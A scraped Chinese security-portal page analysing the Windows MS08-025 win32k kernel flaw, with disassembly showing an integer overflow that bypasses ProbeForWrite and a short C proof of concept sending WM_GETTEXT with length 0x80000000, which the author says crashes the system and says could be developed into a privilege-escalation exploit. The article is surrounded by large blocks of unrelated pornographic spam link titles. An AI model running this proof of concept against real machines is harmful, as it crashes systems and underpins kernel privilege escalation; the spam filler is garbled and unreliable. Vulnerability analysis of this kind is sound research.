精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

ms08025內(nèi)核漏洞深度分析

安全 黑客攻防
成功利用此漏洞的本地攻擊者可以完全控制受影響的系統(tǒng)。 攻擊者可隨后安裝程序;查看、更改或刪除數(shù)據(jù);或者創(chuàng)建新帳戶。這是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 所有受支持版本的重要安全更新。

漏洞對(duì)于系統(tǒng)用戶來(lái)說(shuō)并不陌生,幾乎是所有的系統(tǒng)和軟件都會(huì)有漏洞產(chǎn)生。我們幾乎就是在填補(bǔ)漏洞和發(fā)現(xiàn)新漏洞中使用系統(tǒng)的。ms08025漏洞是一個(gè)可被攻擊者利用的漏洞,本篇文章分析了ms08025漏洞補(bǔ)丁,下面我們就從NtUserfnOUTSTRING 函數(shù)中的問(wèn)題來(lái)展開(kāi)我們的分析。

.text:BF86FB04 ; int __stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int)
.text:BF86FB04 __stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near
.text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6Ep
.text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x)+61p
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-Ep
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)+6Dp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4Bp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)+60p ...
.text:BF86FB04
.text:BF86FB04 var_24  = dword ptr -24h
.text:BF86FB04 var_20  = dword ptr -20h
.text:BF86FB04 UserBuffer  = dword ptr -1Ch
.text:BF86FB04 ms_exc  = CPPEH_RECORD ptr -18h
.text:BF86FB04 arg_0   = dword ptr  8
.text:BF86FB04 arg_4   = dword ptr  0Ch
.text:BF86FB04 arg_8   = dword ptr  10h
.text:BF86FB04 Address = dword ptr  14h
.text:BF86FB04 arg_10  = dword ptr  18h
.text:BF86FB04 arg_14  = dword ptr  1Ch
.text:BF86FB04 arg_18  = dword ptr  20h
.text:BF86FB04
.text:BF86FB04 ; FUNCTION CHUNK AT .text:BF86FAE1 SIZE 0000001E BYTES
.text:BF86FB04
.text:BF86FB04 push14h
.text:BF86FB06 pushoffset unk_BF98D250
.text:BF86FB0B call__SEH_prolog
.text:BF86FB0B
.text:BF86FB10 xor edx, edx
.text:BF86FB12 mov [ebp+ms_exc.disabled], edx
.text:BF86FB15 mov eax, [ebp+var_20]
.text:BF86FB18 mov ecx, 7FFFFFFFh
.text:BF86FB1D and eax, ecx
.text:BF86FB1F mov esi, [ebp+arg_18]
.text:BF86FB22 shl esi, 1Fh
.text:BF86FB25 or  eax, esi
.text:BF86FB27 mov [ebp+var_20], eax
.text:BF86FB2A mov esi, eax
.text:BF86FB2C xor esi, [ebp+arg_8]  -> esi = 緩沖區(qū)長(zhǎng)度
.text:BF86FB2F and esi, ecx
.text:BF86FB31 xor eax, esi
.text:BF86FB33 mov [ebp+var_20], eax
.text:BF86FB36 cmp [ebp+arg_18], edx  -> 如果是 ansi 方式就直接進(jìn)行檢查

否則需要計(jì)算unicode的大小
.text:BF86FB39 jnz short loc_BF86FB47
.text:BF86FB39
.text:BF86FB3B lea esi, [eax+eax]<- 注意這里,問(wèn)題就在這

此時(shí) eax = unicode字符串的長(zhǎng)度,
<- 當(dāng) eax = 0x80000000 的時(shí)候 eax + eax = 0x100000000,32位的寄存器
<- 被溢出了,esi = 0
.text:BF86FB3E xor esi, eax
.text:BF86FB40 and esi, ecx
.text:BF86FB42 xor eax, esi
.text:BF86FB44 mov [ebp+var_20], eax -> 保存unicode占用的空間大小
.text:BF86FB44
.text:BF86FB47
.text:BF86FB47 loc_BF86FB47:   ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35j
.text:BF86FB47 mov [ebp+var_24], edx
.text:BF86FB4A mov esi, [ebp+Address]
.text:BF86FB4D mov [ebp+UserBuffer], esi
.text:BF86FB50 xor ebx, ebx
.text:BF86FB52 inc ebx
.text:BF86FB53 pushebx ; Alignment
.text:BF86FB54 and eax, ecx
.text:BF86FB56 pusheax ; Length <- 由于 eax = 0,所以ProbeForWrite被繞過(guò)
.text:BF86FB57 pushesi ; Address
.text:BF86FB58 callds:ProbeForWrite(x,x,x)


bf80a1b0 e96ef4ffff   jmp   win32k!xxxRealDefWindowProc+0x1235 (bf809623)
bf80a1b5 d1e8 shr eax,1
bf80a1b7 894510   mov [ebp+0x10],eax
bf80a1ba ebf1 jmpwin32k!xxxRealDefWindowProc+0x190 (bf80a1ad)
bf80a1bc 8b4514   mov eax,[ebp+0x14]
bf80a1bf f6400780 testbyte ptr [eax+0x7],0x80
bf80a1c3 8b4008   mov eax,[eax+0x8]
bf80a1c6 7408 jz win32k!xxxRealDefWindowProc+0x105 (bf80a1d0)
bf80a1c8 c60000   mov byte ptr [eax],0x0
bf80a1cb e951f4ffff   jmp   win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d0 668910  mov [eax],dx<- 在這里,對(duì)前面?zhèn)魅氲闹羔樳M(jìn)行了2個(gè)字節(jié)的寫(xiě)操作,寫(xiě)入的數(shù)據(jù)為0
bf80a1d3 e949f4ffff   jmp   win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d8 6a00 push0x0
bf80a1da 6a02 push0x2
bf80a1dc ff7638   pushdword ptr [esi+0x38]
bf80a1df e8d1690200   callwin32k!BuildHwndList (bf830bb5)
bf80a1e4 8bf8 mov edi,eax
bf80a1e6 85ff testedi,edi
bf80a1e8 0f8433f4ffff jewin32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1ee 8d7710   lea esi,[edi+0x10]

那么怎么觸發(fā)ms08025漏洞呢,我又分析了user32.dll 和 win32k!NtUserMessageCall,發(fā)現(xiàn)觸發(fā)這個(gè)漏洞很簡(jiǎn)單,只需要調(diào)用 SendMessageW 發(fā)送WM_GETTEXT 消息就能夠觸發(fā)了,下面是poc代碼(注,改代碼運(yùn)行后由于在內(nèi)核寫(xiě)了未映射的內(nèi)存,會(huì)直接藍(lán)屏,要改成可用的exploit,可以參考我以前的exploit)

 

  1.  
  2. #include <stdio.h> 
  3. #include <windows.h> 
  4.  
  5. int main(int argc,char *argv[])  
  6. {  
  7. DWORDdwHookAddress = 0x80000000;  
  8.  
  9. printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );  
  10. printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );  
  11.  
  12. SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );  
  13. return 0;  

 

【編輯推薦】

  1. Web應(yīng)用防火墻的功能與價(jià)值
  2. xss攻擊 Web安全新挑戰(zhàn)
  3. 防火墻安全測(cè)試之規(guī)則分析工具
  4. Web應(yīng)用防火墻的主要特性
  5. 防止入侵從Web應(yīng)用安全漏洞做起
責(zé)任編輯:張啟峰 來(lái)源: xfocu
相關(guān)推薦

2009-02-20 16:56:53

2017-01-15 23:46:37

2015-03-11 16:23:01

2017-01-15 22:51:16

2020-10-12 09:43:41

iOS 14漏洞蘋(píng)果

2014-06-09 09:19:10

2010-09-16 14:36:20

2014-12-03 10:37:45

2020-04-01 10:28:12

Apache HBas數(shù)據(jù)結(jié)構(gòu)算法

2015-03-13 10:06:55

2017-03-10 20:26:27

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2014-07-29 15:44:33

Linux內(nèi)核Crash

2025-04-11 09:37:31

2024-12-17 16:09:36

2009-10-20 09:58:38

2015-02-06 15:51:11

2013-07-24 14:06:48

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2020-10-19 14:01:34

漏洞Linux代碼
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

最新中文字幕久久| 国产精品wwww| 69xxx免费视频| 精品捆绑调教一区二区三区| 不卡一区二区三区四区| 亲子乱一区二区三区电影| 夜夜春很很躁夜夜躁| 欧美电影在线观看网站| 一区二区三区资源| 欧美三日本三级少妇三99| 亚洲性生活大片| 亚洲黄色毛片| 中文字幕国产精品| 波多野结衣办公室双飞| 欧洲亚洲两性| 亚洲免费看黄网站| 欧美激情第一页在线观看| 91黄色在线视频| 亚洲第一在线| 日韩中文字幕在线视频播放| 69亚洲乱人伦| 日韩综合久久| 欧美日韩亚洲系列| 蜜桃视频成人在线观看| 日韩电影免费| 国产成人综合视频| 国产精品 欧美在线| 九九九久久久久| 日韩av在线播放网址| 亚洲精品国产精品久久清纯直播| 无需播放器的av| 不卡专区在线| 亚洲男人的天堂av| 色一情一区二区三区四区 | 欧美日韩激情视频| 宅男在线精品国产免费观看| 深夜福利免费在线观看| 国产99精品国产| 国产精品一区二区女厕厕| 亚洲天堂日韩av| 国内精品美女在线观看| 久久久999精品免费| 欧美福利第一页| 亚洲瘦老头同性70tv| 精品国产乱码久久久久久1区2区| 特级西西444www| 亚洲成人高清| 欧美人xxxx| 黄大色黄女片18第一次| 国产韩日精品| 欧美午夜精品久久久久久超碰| 男人和女人啪啪网站| 美足av综合网| 亚洲综合在线观看视频| 老司机激情视频| 91高清在线观看视频| 亚洲欧洲一区二区三区| 一区二区不卡在线| 嫩草在线视频| 最新高清无码专区| 午夜啪啪福利视频| 亚洲www色| 亚洲综合自拍偷拍| 成 年 人 黄 色 大 片大 全| 成人av影院在线观看| 一区二区在线电影| 波多野结衣综合网| 偷拍自拍在线看| 色婷婷av一区二区三区大白胸| 97在线免费公开视频| 欧美精品日日操| 欧美亚洲尤物久久| 日本精品一区在线| 超碰成人在线观看| 日韩精品视频免费| www..com.cn蕾丝视频在线观看免费版| 国产一区二区三区天码| 中文字幕亚洲在线| 免费无码毛片一区二区app| 黄色亚洲大片免费在线观看| 久久久女女女女999久久| 成年免费在线观看| 日本vs亚洲vs韩国一区三区二区| 国产美女主播一区| www.蜜臀av.com| 99精品一区二区| 青青草成人网| 米奇777四色精品人人爽| 一区二区三区在线视频观看58| 99在线观看视频免费| 九色porny丨入口在线| 色婷婷亚洲婷婷| 久久国产精品国产精品| 51亚洲精品| 亚洲欧美精品伊人久久| 熟女av一区二区| 在线精品在线| 国产精品91在线观看| a在线观看视频| wwwwww.欧美系列| 中文字幕不卡每日更新1区2区| 日本天堂在线视频| 国产97免费视频| 97se亚洲| 亚洲色图狂野欧美| 国产av无码专区亚洲av毛网站| 亚洲精华国产欧美| 国产精品电影观看| 不卡视频免费在线观看| 国产亚洲欧美日韩在线一区| 国产女人18毛片| 超碰国产一区| 欧美一级在线视频| 白白色免费视频| 精品成人久久| 成人h片在线播放免费网站| 五月婷婷伊人网| 亚洲色图在线播放| 欧美黄网站在线观看| 美国十次综合久久| 亚洲一级黄色片| 国产一级视频在线观看| 精品制服美女久久| 欧美在线一二三区| xxx在线免费观看| 欧美顶级少妇做爰| 久久久久久国产免费a片| 亚洲三级色网| 97视频资源在线观看| av在线三区| 91黄色激情网站| 三级黄色片网站| 激情久久五月| 99re视频在线观看| 美女av在线播放| 欧美吻胸吃奶大尺度电影| 色欲av无码一区二区三区| 亚洲经典在线看| 国产免费一区二区三区| 污视频在线免费观看网站| 欧美一区二区视频在线观看| 精品视频第一页| 久久国产精品第一页| 午夜精品区一区二区三| 高清av一区二区三区| 国产亚洲在线播放| 国产又粗又猛又黄视频| 久久久久久久久蜜桃| 动漫av网站免费观看| 人妖一区二区三区| 欧美一区第一页| 日本一区二区三区在线观看视频| 精品福利一区二区| 黄色性生活一级片| 亚洲一区网站| 欧洲精品国产| 久久久人成影片一区二区三区在哪下载 | 精品人妻无码一区二区色欲产成人 | 国产精品久久久久久久久快鸭 | 天堂va蜜桃一区二区三区| 久久爱av电影| 亚洲十八**毛片| 亚洲视频国产视频| 最近中文字幕免费在线观看| 日本一区二区综合亚洲| 亚洲福利精品视频| 四季av一区二区三区免费观看| 国产中文字幕亚洲| 4438x成人网全国最大| 精品毛片乱码1区2区3区| 国产一级aa大片毛片| av在线综合网| 国产免费视频传媒| 色天天久久综合婷婷女18| 成人免费视频网址| 色婷婷在线播放| 日韩高清有码在线| 黄色片视频免费| 欧美极品少妇xxxxⅹ高跟鞋 | 欧美大胆性生话| 一区二区成人精品| 99热这里只有精品在线| 精品国产乱码久久久久久婷婷| 国产成人无码精品久久二区三| 蜜臀av性久久久久蜜臀aⅴ流畅| 亚洲最新免费视频| 99精品中文字幕在线不卡| 2020久久国产精品| 日本不卡视频| 精品国产一区二区精华| 亚洲国产成人精品女人久久| 国产精品久久久爽爽爽麻豆色哟哟| 无码人妻一区二区三区在线视频| 国产婷婷精品| 中文字幕剧情在线观看一区| 国产精品宾馆| 国产精品日韩欧美综合| 蜜臀av国内免费精品久久久夜夜| 亚洲午夜小视频| www久久久久久| 在线免费精品视频| 精品小视频在线观看| 国产农村妇女毛片精品久久麻豆| 91精品人妻一区二区三区蜜桃2 | 欧洲成人免费aa| 国产三区在线观看| 亚洲欧美国产va在线影院| 国产99对白在线播放| 色偷偷久久人人79超碰人人澡 | 日韩午夜电影网| 国产亚洲第一区| 人人精品久久| 国产成人精彩在线视频九色| 视频在线观看入口黄最新永久免费国产 | av在线日韩| 高清欧美性猛交| 久久77777| 亚洲天堂av女优| 欧美 日韩 国产 成人 在线| 欧美人妇做爰xxxⅹ性高电影| 天天干天天干天天| 亚洲一区二区三区四区不卡| 97精品在线播放| 久久精品亚洲麻豆av一区二区| 四虎国产精品免费| 久久精品国产免费看久久精品| 亚洲色欲综合一区二区三区| 精品999成人| 粉嫩av一区二区三区天美传媒 | 国产电影精品久久禁18| 亚洲综合欧美在线| 视频一区二区三区在线| 欧美啪啪免费视频| 亚洲欧洲日本mm| 轻点好疼好大好爽视频| 亚洲91视频| 亚洲午夜精品久久久中文影院av| 免费一区二区| 蜜桃91精品入口| 亚洲福利网站| 欧美成人dvd在线视频| 啪啪国产精品| 国产在线精品一区二区中文| 丁香综合av| 国产精成人品localhost| 亚洲日本视频在线| 91在线看网站| 99精品中文字幕在线不卡| y111111国产精品久久婷婷| 欧美视频三区| 91视频免费在线观看| av综合网页| 国产在线精品二区| 日本福利一区| 欧美精品中文字幕一区二区| 亚洲最好看的视频| 色综合影院在线观看| 日韩久久视频| 免费看污污视频| 欧美日韩国产综合网| av日韩在线看| 99国产精品视频免费观看一公开| 极品美女扒开粉嫩小泬| 六月丁香综合| 爱情岛论坛vip永久入口| 久久精品久久精品| 老司机av网站| 99麻豆久久久国产精品免费| 亚洲成人av免费在线观看| 久久久久久麻豆| 久久视频一区二区三区| 亚洲色图视频网| 国产乱码久久久久久| 色综合久久综合网| 91国内精品久久久| 亚洲国产成人爱av在线播放| 日本在线一二三| 日韩小视频网址| 国产嫩草在线视频| 国产国语videosex另类| 亚洲一区av| 国产乱码一区| 国产日韩欧美一区二区三区| 在线观看国产一区| 狠狠色丁香久久综合频道| 男女av免费观看| 韩国欧美一区二区| 欧洲一级黄色片| 专区另类欧美日韩| 国产精品美女久久久久av爽| 欧美性生交片4| 亚洲美女综合网| 亚洲人在线视频| 肉肉视频在线观看| 国产精品第3页| 9l亚洲国产成人精品一区二三| 日韩精品最新在线观看| 欧美欧美天天天天操| 欧美激情国产精品日韩| 国产一区二区三区综合| 中文人妻一区二区三区| 亚洲色图在线播放| 销魂美女一区二区| 精品久久人人做人人爽| 高清在线观看av| 色综合视频一区中文字幕| 成人午夜在线| 久久综合色一本| 午夜精品剧场| xx欧美撒尿嘘撒尿xx| 99精品在线观看视频| 九九久久免费视频| 欧美日韩在线亚洲一区蜜芽| 亚洲 欧美 激情 小说 另类| 久久综合久中文字幕青草| 久久久人成影片一区二区三区在哪下载 | 日本免费在线视频不卡一不卡二| 又大又长粗又爽又黄少妇视频| 欧美国产成人精品| 亚洲免费在线视频观看| 日韩欧美国产一区在线观看| 午夜伦理在线| 国产va免费精品高清在线观看| jizz久久精品永久免费| 综合国产精品久久久| 免费视频最近日韩| 爱爱免费小视频| 亚洲va韩国va欧美va| www.av黄色| 麻豆乱码国产一区二区三区 | 91福利社在线观看| 亚洲aaa在线观看| 欧美激情视频在线观看| а天堂中文最新一区二区三区| 色综合久久av| 日韩福利视频网| 真实乱视频国产免费观看| 精品久久久久久久久中文字幕| 亚洲av综合色区无码一区爱av| 久久精品成人欧美大片| 欧美成a人片免费观看久久五月天| xxxxx成人.com| 91精品人妻一区二区三区蜜桃欧美| zzzwww在线看片免费| 欧美日韩在线精品一区二区三区激情 | 久久精品性爱视频| 日韩一区二区三区观看| 韩国av网站在线| 成人a在线观看| 99视频精品视频高清免费| 日韩av片网站| 国产精品美女久久久久久久久久久| 波多野结衣二区三区| 亚洲性夜色噜噜噜7777| 影音成人av| 亚洲福利av| 麻豆精品久久久| 国产一二三av| 欧美夫妻性生活| av观看在线| 国产伦精品一区二区三| 中文一区在线| 成人午夜福利一区二区| 欧美在线观看视频在线| 免费av在线播放| 999热视频在线观看| 在线不卡欧美| jizz欧美性20| 在线观看免费视频综合| 日p在线观看| 91传媒免费看| 亚洲激情另类| 精品国产无码在线观看| 欧美日韩一区二区欧美激情| 黄在线免费看| 国产精品日韩欧美一区二区三区| 国产亚洲一级| 国产又粗又长又硬| 日韩欧美激情四射| 一区一区三区| 尤物国产精品| 成人免费精品视频| 激情网站在线观看| 另类色图亚洲色图| 欧美午夜寂寞| 天天干天天草天天| 亚洲一区二区综合| 黄色片在线播放| 91中文字幕一区| 91久久视频| 免费在线观看a视频| 欧美一区二区在线免费观看| 97超碰在线免费| 亚洲国产精品一区二区第一页| 国产精品亚洲成人| 中文字幕在线播| 色综合久久88色综合天天看泰| 亚洲精品国产动漫| 日韩av福利在线观看| 色域天天综合网|